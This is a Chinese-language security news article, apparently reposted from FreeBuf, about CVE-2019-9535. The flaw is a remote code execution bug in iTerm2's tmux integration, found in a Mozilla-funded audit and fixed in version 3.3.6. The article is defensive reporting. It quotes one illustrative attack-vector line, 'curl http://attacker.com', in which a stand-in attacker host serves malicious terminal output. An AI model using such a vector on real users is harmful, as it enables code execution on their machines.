专栏首页FreeBufMac终端利器 iTerm2被曝严重的RCE漏洞,至少已存在7年(含PoC视频)

Mac终端利器 iTerm2被曝严重的RCE漏洞,至少已存在7年(含PoC视频)

由Mozilla开源支持计划(MOSS)资助、网络安全公司Radically Open Security(ROS)开展的一次独立安全审计结果显示,iTerm 2 中存在一个严重的远程代码执行(RCE)漏洞,且至少已存在7年。

iTerm 2 简介

iTerm2是全球最热门的终端模拟器之一,是开发人员经常使用的MacOS 终端工具,是Mac内置终端app最有力的热门开源工具替代品之一,被很多开发人员称为“Mac 终端利器”。

MOSS 计划选择iTerm2进行安全审计的原因在于它处理不受信任的数据且其使用范围广泛,用户包括高风险目标如开发人员和系统管理员。

漏洞概述

该漏洞的CVE编号是CVE-2019-9535。

在审计过程中,ROS在iTerm2的tmux集成功能中找到了一个至少已存在7年之久的严重漏洞。攻击者如能生成终端输出,则在很多情况下能够在用户计算机上执行命令。这种攻击向量的例子是连接到由攻击者控制的 SSH 服务器或者命令如curl http://attacker.com and tail -f /var/log/apache2/referer_log。

开发人员George Nachman指出,“审计发现某个问题在收到一定的输入后会导致iTerm2发出命令。这个问题非常严重,因为在某些情况下,当用户查看文件或者接收在iTerm2构造的输入时,攻击者就能够在用户机器上执行代码。”

Nachman认为该漏洞影响的iTerm2用户数量介于10万至20万之间。

Mozilla公司的安全工程师Tom Ritter指出,这个漏洞源自iTerm2中的 tmux集成功能。Tumx应用程序是一款终端多路复用器,可允许从单个设备创建并控制多个终端。

CERT协调中心发布漏洞通知表示,可通过使用命令行工具在终端屏幕上打印由攻击者控制的内容,从而利用该漏洞。该中心指出,“潜在的攻击向量包括通过ssh连接至恶意服务器,通过curl 获取恶意网站,或者通过tail –f跟踪包含某些恶意内容的日志文件。”

如下是模拟受害者机器连接到恶意SSH服务器之后,在机器上执行命令的 PoC视频。在这个案例中,只打开一个计算器作为其它更具恶意的命令的占位符。

一般情况下,该漏洞需要某些用户交互或伎俩才能遭触发,但由于它可通过通常被认为是安全的命令利用,因此它的潜在影响力巨大。

影响版本

该漏洞影响于本周早些时候发布的 3.3.5 版本及之前版本。

修复方案

目前补丁已发布但自动更新尚未推送,建议用户立即在iTerm2目录中选择“检查新版本”手动更新至最新版本3.3.6。

*参考来源:Mozilla、TheRegister,由代码卫士编译,转载请注明来自FreeBuf.COM

本文分享自微信公众号 - FreeBuf(freebuf),作者:代码卫士

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-10-10

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 微软对外披露两个0day漏洞详情

    微软近日对外披露了两个0day漏洞详情,其中一个漏洞存在Adobe阅读器中,可被利用导致任意代码执行;另一个漏洞则允许任意代码在Windows kernel内存...

    FB客服
  • 记我在HackerOne上参与的一次漏洞众测邀请项目

    这是一件关于我参与Hackerone平台某漏洞邀请项目的事,在此我要感谢该项目发起公司,他们友善的态度、及时的漏洞修复和奖金发放效率,让所有存在的提交漏洞都能在...

    FB客服
  • Android 0day收购价高达250万美金,首次反超iOS

    近日,漏洞收购商Zerodium更新了安卓和iOS的0day漏洞收购价,发现自2015年公司成立以来,安卓0day漏洞价格首次高于iOS漏洞价格。

    FB客服
  • Intel CPU漏洞,你不知道的那些事儿

    话说, 今天要给大家说一个在业内已经轰动朝野, 然而吃瓜群众可能莫不关心的故事...... 让我用最不技术的语言,让大家了解下这其中的经过吧...... 如果大...

    安恒信息
  • 最近出现的几大疑似漏洞大家需要了解下

    随着大数据时代的发展,互联网的技术更是突飞猛进。同时也给了网络犯罪分子带来了有利条件,他们会通过各种方式去给企业造成不同程度的威胁。而我们最常见的就是他们通过程...

    墨者盾
  • 如果此方案通过,建议网安人员改行!

    “近日,为贯彻落实《网络安全法》,加强网络安全漏洞管理,工信部起草了《网络安全漏洞管理规定(征求意见稿)》,正式向社会公开征求意见,引起了整个网络安全圈的轰动。...

    洛米唯熊
  • Oracle EBS的新漏洞可以更改财务记录

    Oracle解决了其电子商务套件(EBS)业务管理解决方案中的两个安全漏洞,这些漏洞可能使攻击者能够进行广泛的恶意活动,包括篡改组织的财务记录。

    FB客服
  • 工业防火墙又出事了!施耐德工业防火墙被爆严重安全漏洞

    根据国外媒体的最新报道,工业安全公司CyberX的安全研究专家在2016年工业控制系统(ICS)网络安全大会上披露了好几个严重的安全漏洞,其中就包括一个存在于施...

    FB客服
  • 2016年度Web漏洞统计之Exploit-db

    2016年我们耳边经常想起“大数据”、“物联网”、“云”、“工控系统”等关键词,很多个厂家、行业都在热火朝天的做着“大数据”,随着2016年的过去,新的一年到来...

    FB客服
  • 2018年信息安全大事件一览

    回顾2018年,网络犯罪分子通过不断升级攻击手段,进一步提高攻击成功率并加速感染设备的数量。凭借拓展攻击渠道和变换手段,发动TB级别DDoS攻击、瞄准区块链各节...

    FB客服

扫码关注云+社区

领取腾讯云代金券